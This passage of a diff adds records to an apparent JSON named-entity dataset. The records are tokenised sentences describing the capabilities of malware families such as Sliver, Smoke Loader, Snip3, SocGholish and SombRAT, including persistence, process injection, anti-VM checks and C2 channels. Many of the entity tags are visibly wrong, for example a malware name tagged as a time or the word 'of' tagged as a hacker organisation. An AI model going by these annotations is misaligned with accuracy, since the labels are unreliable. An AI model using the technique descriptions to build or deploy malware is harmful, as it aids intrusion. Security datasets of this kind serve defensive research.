+ "take", + "screenshots", + "of", + "the", + "victim’s", + "active", + "display." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "use", + "standard", + "encoding", + "techniques", + "like", + "gzip", + "and", + "hex", + "to", + "ASCII", + "to", + "encode", + "the", + "C2", + "communication", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "encode", + "binary", + "data", + "into", + "a", + ".PNG", + "file", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "use", + "AES-GCM-256", + "to", + "encrypt", + "a", + "session", + "key", + "for", + "C2", + "message", + "exchange." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "has", + "the", + "ability", + "to", + "gather", + "network", + "configuration", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "collect", + "network", + "connection", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "has", + "the", + "ability", + "to", + "support", + "C2", + "communications", + "over", + "HTTP/S." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "can", + "use", + "SSL/TLS", + "for", + "its", + "HTTPS", + "Telegram", + "Bot", + "API-based", + "C2", + "channel." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "has", + "the", + "ability", + "to", + "use", + "the", + "Telegram", + "Bot", + "API", + "from", + "Telegram", + "Messenger", + "to", + "send", + "and", + "receive", + "messages." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "can", + "only", + "execute", + "correctly", + "if", + "the", + "word", + "`Platypus`", + "is", + "passed", + "to", + "it", + "on", + "the", + "command", + "line." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "has", + "the", + "ability", + "to", + "download", + "files." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "can", + "use", + "variations", + "of", + "Microsoft", + "and", + "Outlook", + "spellings,", + "such", + "as", + "\"Microsift\",", + "in", + "its", + "file", + "names", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "can", + "use", + "a", + "custom", + "hex", + "byte", + "swapping", + "encoding", + "scheme", + "to", + "obfuscate", + "tasking", + "traffic." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "has", + "the", + "ability", + "to", + "use", + "a", + "custom", + "hex", + "byte", + "swapping", + "encoding", + "scheme", + "combined", + "with", + "an", + "obfuscated", + "Base64", + "function", + "to", + "protect", + "program", + "strings", + "and", + "Telegram", + "credentials." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "can", + "use", + "Python", + "scripts", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "has", + "the", + "ability", + "to", + "add", + "itself", + "to", + "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift`", + "for", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "can", + "obtain", + "the", + "IP", + "address", + "of", + "a", + "victim", + "host." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Purp", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "can", + "obtain", + "the", + "id", + "of", + "a", + "logged", + "in", + "user." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "can", + "contact", + "actor-controlled", + "C2", + "servers", + "by", + "using", + "the", + "Telegram", + "API", + "over", + "HTTPS." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Small", + "Sieve", + "can", + "use", + "`cmd.exe`", + "to", + "execute", + "commands", + "on", + "a", + "victim's", + "system." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "searches", + "for", + "files", + "named", + "logins.json", + "to", + "parse", + "for", + "credentials." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "searches", + "for", + "credentials", + "stored", + "from", + "web", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "deobfuscates", + "its", + "code." + ], + "ner_tags": [ + "I-HackOrg", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "uses", + "a", + "simple", + "one-byte", + "XOR", + "method", + "to", + "obfuscate", + "values", + "in", + "the", + "malware." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "recursively", + "searches", + "through", + "directories", + "for", + "files." + ], + "ner_tags": [ + "B-Tool", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "downloads", + "a", + "new", + "version", + "of", + "itself", + "once", + "it", + "has", + "installed.", + "It", + "also", + "downloads", + "additional", + "plugins." + ], + "ner_tags": [ + "I-HackOrg", + "B-Tool", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "searches", + "through", + "Outlook", + "files", + "and", + "directories", + "(e.g.,", + "inbox,", + "sent,", + "templates,", + "drafts,", + "archives,", + "etc.)." + ], + "ner_tags": [ + "B-HackOrg", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "spawns", + "a", + "new", + "copy", + "of", + "c:\\windows\\syswow64\\explorer.exe", + "and", + "then", + "replaces", + "the", + "executable", + "code", + "in", + "memory", + "with", + "malware." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "injects", + "into", + "the", + "Internet", + "Explorer", + "process." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "adds", + "a", + "Registry", + "Run", + "key", + "for", + "persistence", + "and", + "adds", + "a", + "script", + "in", + "the", + "Startup", + "folder", + "to", + "deploy", + "the", + "payload." + ], + "ner_tags": [ + "I-HackOrg", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "launches", + "a", + "scheduled", + "task." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "scans", + "processes", + "to", + "perform", + "anti-VM", + "checks." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "adds", + "a", + "Visual", + "Basic", + "script", + "in", + "the", + "Startup", + "folder", + "to", + "deploy", + "the", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Smoke", + "Loader", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "obfuscate", + "strings", + "using", + "junk", + "Chinese", + "characters." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "decode", + "its", + "second-stage", + "PowerShell", + "script", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "has", + "been", + "delivered", + "to", + "targets", + "via", + "downloads", + "from", + "malicious", + "domains." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "execute", + "PowerShell", + "scripts", + "in", + "a", + "hidden", + "window." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "download", + "additional", + "payloads", + "to", + "compromised", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "gain", + "execution", + "through", + "the", + "download", + "of", + "visual", + "basic", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "has", + "been", + "executed", + "through", + "luring", + "victims", + "into", + "clicking", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "download", + "and", + "execute", + "additional", + "payloads", + "and", + "modules", + "over", + "separate", + "communication", + "channels." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "has", + "the", + "ability", + "to", + "obfuscate", + "strings", + "using", + "XOR", + "encryption." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "use", + "a", + "PowerShell", + "script", + "for", + "second-stage", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "use", + "RunPE", + "to", + "execute", + "malicious", + "payloads", + "within", + "a", + "hollowed", + "Windows", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "create", + "a", + "VBS", + "file", + "in", + "startup", + "to", + "persist", + "after", + "system", + "restarts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "has", + "been", + "delivered", + "to", + "victims", + "through", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "has", + "been", + "delivered", + "to", + "victims", + "through", + "e-mail", + "links", + "to", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "has", + "the", + "ability", + "to", + "detect", + "Windows", + "Sandbox,", + "VMWare,", + "or", + "VirtualBox", + "by", + "querying", + "`Win32_ComputerSystem`", + "to", + "extract", + "the", + "`Manufacturer`", + "string." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "B-SecTeam", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "has", + "the", + "ability", + "to", + "query", + "`Win32_ComputerSystem`", + "for", + "system", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "execute", + "`WScript.Sleep`", + "to", + "delay", + "execution", + "of", + "its", + "second", + "stage." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "use", + "visual", + "basic", + "scripts", + "for", + "first-stage", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "download", + "additional", + "payloads", + "from", + "web", + "services", + "including", + "Pastebin", + "and", + "top4top." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Snip3", + "can", + "query", + "the", + "WMI", + "class", + "`Win32_ComputerSystem`", + "to", + "gather", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "can", + "profile", + "compromised", + "systems", + "to", + "identify", + "domain", + "trust", + "relationships." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "has", + "been", + "distributed", + "through", + "compromised", + "websites", + "with", + "malicious", + "content", + "often", + "masquerading", + "as", + "browser", + "updates." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "SocGholish", + "JavaScript", + "payload", + "has", + "been", + "delivered", + "within", + "a", + "compressed", + "ZIP", + "archive.", + "SocGholish", + "has", + "also", + "single", + "or", + "double", + "Base-64", + "encoded", + "references", + "to", + "its", + "second-stage", + "server", + "URLs." + ], + "ner_tags": [ + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "can", + "exfiltrate", + "data", + "directly", + "to", + "its", + "C2", + "domain", + "via", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SocGholish", + "can", + "download", + "additional", + "malware", + "to", + "infected", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "SocGholish", + "payload", + "is", + "executed", + "as", + "JavaScript." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "can", + "send", + "output", + "from", + "`whoami`", + "to", + "a", + "local", + "temp", + "file", + "using", + "the", + "naming", + "convention", + "`rad<5-hex-chars>.tmp`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "SocGholish", + "has", + "lured", + "victims", + "into", + "interacting", + "with", + "malicious", + "links", + "on", + "compromised", + "websites", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "has", + "been", + "named", + "`AutoUpdater.js`", + "to", + "mimic", + "legitimate", + "update", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "can", + "list", + "processes", + "on", + "targeted", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "can", + "identify", + "the", + "victim's", + "browser", + "in", + "order", + "to", + "serve", + "the", + "correct", + "fake", + "update", + "page." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "has", + "been", + "spread", + "via", + "emails", + "containing", + "malicious", + "links." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "has", + "the", + "ability", + "to", + "enumerate", + "system", + "information", + "including", + "the", + "victim", + "computer", + "name." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "can", + "use", + "IP-based", + "geolocation", + "to", + "limit", + "infections", + "to", + "victims", + "in", + "North", + "America,", + "Europe,", + "and", + "a", + "small", + "number", + "of", + "Asian-Pacific", + "nations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Area", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "has", + "the", + "ability", + "to", + "enumerate", + "the", + "domain", + "name", + "of", + "a", + "victim,", + "as", + "well", + "as", + "if", + "the", + "host", + "is", + "a", + "member", + "of", + "an", + "Active", + "Directory", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "can", + "use", + "`whoami`", + "to", + "obtain", + "the", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "has", + "used", + "Amazon", + "Web", + "Services", + "to", + "host", + "second-stage", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SocGholish", + "has", + "used", + "WMI", + "calls", + "for", + "script", + "execution", + "and", + "system", + "profiling." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Socksbot", + "creates", + "a", + "suspended", + "svchost", + "process", + "and", + "injects", + "its", + "DLL", + "into", + "it." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Socksbot", + "can", + "write", + "and", + "execute", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Socksbot", + "can", + "list", + "all", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Socksbot", + "can", + "start", + "SOCKS", + "proxy", + "threads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Socksbot", + "can", + "take", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SodaMaster", + "can", + "use", + "a", + "hardcoded", + "RSA", + "key", + "to", + "encrypt", + "some", + "of", + "its", + "C2", + "traffic." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SodaMaster", + "has", + "the", + "ability", + "to", + "download", + "additional", + "payloads", + "from", + "C2", + "to", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SodaMaster", + "can", + "use", + "<code>RegOpenKeyW</code>", + "to", + "access", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SodaMaster", + "can", + "use", + "\"stackstrings\"", + "for", + "obfuscation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "SodaMaster", + "can", + "search", + "a", + "list", + "of", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SodaMaster", + "has", + "the", + "ability", + "to", + "query", + "the", + "Registry", + "to", + "detect", + "a", + "key", + "specific", + "to", + "VMware." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SodaMaster", + "can", + "use", + "RC4", + "to", + "encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SodaMaster", + "can", + "check", + "for", + "the", + "presence", + "of", + "the", + "Registry", + "key", + "<code>HKEY_CLASSES_ROOT\\\\Applications\\\\VMwareHostOpen.exe</code>", + "before", + "proceeding", + "to", + "its", + "main", + "functionality." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SodaMaster", + "can", + "enumerate", + "the", + "host", + "name", + "and", + "OS", + "version", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SodaMaster", + "can", + "identify", + "the", + "username", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SodaMaster", + "has", + "the", + "ability", + "to", + "put", + "itself", + "to", + "\"sleep\"", + "for", + "a", + "specified", + "time." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "has", + "encrypted", + "collected", + "data", + "with", + "AES-256", + "using", + "a", + "hardcoded", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "SSL", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "communicate", + "over", + "DNS", + "with", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "has", + "collected", + "data", + "and", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "run", + "<code>upload</code>", + "to", + "decrypt", + "and", + "upload", + "files", + "from", + "storage." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "use", + "a", + "custom", + "DGA", + "to", + "generate", + "a", + "subdomain", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "execute", + "<code>loadfromfile</code>,", + "<code>loadfromstorage</code>,", + "and", + "<code>loadfrommem</code>", + "to", + "inject", + "a", + "DLL", + "from", + "disk,", + "storage,", + "or", + "memory", + "respectively." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "has", + "uploaded", + "collected", + "data", + "and", + "files", + "from", + "a", + "compromised", + "host", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "has", + "the", + "ability", + "to", + "run", + "<code>cancel</code>", + "or", + "<code>closeanddeletestorage</code>", + "to", + "remove", + "all", + "files", + "from", + "storage", + "and", + "delete", + "the", + "storage", + "temp", + "file", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "can", + "execute", + "<code>enum</code>", + "to", + "enumerate", + "files", + "in", + "storage", + "on", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SombRAT", + "has", + "the", + "ability", + "to", + "download", + "and", + "execute", + "additional", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + 